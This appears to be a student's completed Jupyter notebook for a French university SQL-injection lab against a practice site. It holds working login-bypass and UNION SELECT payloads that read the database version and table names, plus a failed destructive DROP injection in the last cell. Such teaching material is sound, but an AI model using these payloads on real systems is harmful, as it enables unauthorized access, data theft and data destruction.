# ipl I317B Sécurité : labos
## Semaine 2 : Vulnérabilitées web - Injection SQL (1)

### Exercice 1a:
Pour ce premier exercice, nous vous demandons de passer le formulaire de connexion codé par un mauvais développeur : http://labosecuipl.alwaysdata.net/23/s02/ex1a/

In [5]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex1a/",
    data={  #TODO
        "login": '" or 1=1;--',
        "password": ""
    }

)
if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi

Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

SELECT <...> FROM <...> WHERE login=" " OR 1=1;-- AND password=" "

### Exercice 1b:
Une variante du précédant formulaire a été mit en place, connectez-vous à nouveau à celui-ci : http://labosecuipl.alwaysdata.net/23/s02/ex1b/

In [6]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex1b/",
    data={
        "login": ' \' or 1=1;--',
        "password": ""
    }
)

if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi

Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

SELECT <...> FROM <...> WHERE login=' ' OR 1=1;-- AND password=' '

### Exercice 2:
Une variante du précédant formulaire a été mit en place, connectez-vous à nouveau à celui-ci : http://labosecuipl.alwaysdata.net/23/s02/ex2/

In [9]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex2/",
    data={
        "login": "') or 1=1;--",
        "password": ""
    }
)

if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi

Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

SELECT <...> FROM <...> WHERE ( login=' ' ) or 1=1;-- AND `password`=' ')

### Exercice 3:
Dans cette nouvelle version, le développeur semble avoir prit conscience que certains caractères ne devraient pas être accepté ... mais vous êtes plus malin que lui, n'est-ce pas ?

http://labosecuipl.alwaysdata.net/23/s02/ex3/

In [11]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex3/",
    data={
        "login": '"/**/or/**/true;--',
        "password": ""
    }
)

if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi

### Exercice 4:

Une variante du précédant formulaire a été mit en place, il semblerait que notre mauvais dev veuille cette fois-ci empêcher les requêtes automatisées.
Encore une fois, trouvez le moyen de vous y connecter : http://labosecuipl.alwaysdata.net/23/s02/ex4/

In [29]:
import requests
from bs4 import BeautifulSoup

session = requests.session()

headers = {'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'}

page_form = session.get('http://labosecuipl.alwaysdata.net/23/s02/ex4/');

soup = BeautifulSoup(page_form.text)
token = soup.find('input', {"type": "hidden"})['value']

page = session.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex4/",
    data={
        "login": "'/**/or/**/true;--",
        "password": "",
        "token": token
    },
    headers=headers
)

<!DOCTYPE html>
<html lang="en">
<p id='result'>Good job, it's time to do the next exercice !</p></html>

### Exercice 5:
Un espion sur place m'a confirmé que, ne parvenant pas à circonvenir nos injections, le dévelopeur derrière ce site à juste décidé de vider la base de donnée `users`. Il s'est venté bruyament de sa nouvelle idée à coté de la machine à café :

> "J'ai vidé la base de donnée ! Haha ! La requête sql de connexion ne peut plus renvoyé de login utilisateur donc impossible pour eux de se connecter ! Haha, ces maudits hackers ne m'auront pas cette fois-ci !".

Désormait, toutes les requêtes, même injectée "toujours vraie" sont vide ... C'est embêtant mais je suis sûr qu'on peut arranger le coup !

http://labosecuipl.alwaysdata.net/23/s02/ex5/

In [1]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex5/",
    data={
        "login": "' UNION SELECT 'a', 'b' ;--",
        "password": ""
    }
)

if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi

### Exercice 6a:
Pour ce nouvel exercice, nous allons utiliser un nouveau formulaire. Ce formulaire nous permet de chercher parmi les éléments du tableau périodique des éléments. Par exemple, si vous cherchez "Co*", vous obtiendrez les informations sur le copper (cuivre) et le cobalt.

http://labosecuipl.alwaysdata.net/23/s02/ex6/

Commencez par récupérer le numéro de version de notre base de donnée. Ici, nous connaissons le type de base de donnée : SQLITE, un petit détour par la documentation nous permet deconnaître la fonction parfait pour cela : https://www.sqlite.org/lang_corefunc.html#sqlite_version.

In [14]:
import requests

page = requests.get(
    "http://labosecuipl.alwaysdata.net/23/s02/ex6/",
    params={
        "name": "'UNION SELECT sqlite_version(), 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a','a', 'a', 'a', 'a', 'a';--",
    }
)

print(page.text)

<!DOCTYPE html>
<html lang="en">
<style type="text/css">
table, th, td {
   border: 1px solid black;
}
</style>
<body>
<form action='.' method='GET'>
  Name:<br>
  <input type='text' name='name'><br>
  <input type='submit' value='Submit'>
</form>

<h2>Request for name : "'UNION SELECT sqlite_version(), 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a','a', 'a', 'a', 'a', 'a';--"</h2><table>
        <tr><th>name</th><th>symbol</th><th>atomic_number</th><th>atomic_weight</th><th>density</th><th>melting_point</th><th>boiling_point</th><th>atomic_radius</th><th>covalent_radius</th><th>ionic_radius</th><th>specific_volume</th><th>specific_heat</th><th>heat_fusion</th><th>heat_evaporation</th><th>thermal_conductivity</th><th>pauling_electronegativity</th><th>first_ionisation_energy</th><th>oxidation_states</th><th>electronic_configuration</th><th>lattice</th><th>lattice_constant</th></tr><tr>    <td>3.27.2</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
</tr></table></body>
</html>

Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

SELECT <... 21 elements> FROM <TABLE> WHERE name LIKE '' UNION SELECT sqlite_version(), 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a','a', 'a', 'a', 'a', 'a';--';

### Exercice 6b:
Dans le même ordre d’idée, je vous invite à récupérer la liste des tables présentes dans cette base de donnée.

Comme souvent, la lecture de la documentation peut vous faciliter la vie : https://www.sqlite.org/faq.html#q7

<sup><sub>(Et comme bien souvent ... la vrai vie c'est compliqué : https://www.sqlite.org/schematab.html#alternative_names )</sub></sup>

In [16]:
import requests

page = requests.get(
    "http://labosecuipl.alwaysdata.net/23/s02/ex6/",
    params={
        "name": "'UNION SELECT name, 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a','a', 'a', 'a', 'a', 'a' FROM sqlite_master WHERE type='table';--",
    }
)

print(page.text)

<!DOCTYPE html>
<html lang="en">
<style type="text/css">
table, th, td {
   border: 1px solid black;
}
</style>
<body>
<form action='.' method='GET'>
  Name:<br>
  <input type='text' name='name'><br>
  <input type='submit' value='Submit'>
</form>

<h2>Request for name : "'UNION SELECT name, 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a','a', 'a', 'a', 'a', 'a' FROM sqlite_master WHERE type='table';--"</h2><table>
        <tr><th>name</th><th>symbol</th><th>atomic_number</th><th>atomic_weight</th><th>density</th><th>melting_point</th><th>boiling_point</th><th>atomic_radius</th><th>covalent_radius</th><th>ionic_radius</th><th>specific_volume</th><th>specific_heat</th><th>heat_fusion</th><th>heat_evaporation</th><th>thermal_conductivity</th><th>pauling_electronegativity</th><th>first_ionisation_energy</th><th>oxidation_states</th><th>electronic_configuration</th><th>lattice</th><th>lattice_constant</th></tr><tr>    <td>elements</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
</tr><tr>    <td>gemstones</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
</tr><tr>    <td>planets</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
    <td>a</td>
</tr></table></body>
</html>

### Exercice 6c (bonus):
Maintenant que vous connaissez toutes les tables dans cette base de données ainsi que le nom de chaque champ, pourquoi ne pas récupérer le contenu de chacune de ces tables ?

In [20]:
import requests


page = requests.get(
    "http://labosecuipl.alwaysdata.net/23/s02/ex6/",
    params={
        "name": "'UNION DROP planets, 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a','a', 'a', 'a', 'a', 'a' ;--",
    }
)

print(page.text)

<!DOCTYPE html>
<html lang="en">
<style type="text/css">
table, th, td {
   border: 1px solid black;
}
</style>
<body>
<form action='.' method='GET'>
  Name:<br>
  <input type='text' name='name'><br>
  <input type='submit' value='Submit'>
</form>

<h2>Request for name : "'UNION DROP planets, 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a', 'a','a', 'a', 'a', 'a', 'a' ;--"</h2><br />
<b>Fatal error</b>:  Uncaught Error: Call to a member function execute() on boolean in /home/labosecuipl/www/23/s02/ex6/index.php:23
Stack trace:
#0 {main}
  thrown in <b>/home/labosecuipl/www/23/s02/ex6/index.php</b> on line <b>23</b><br />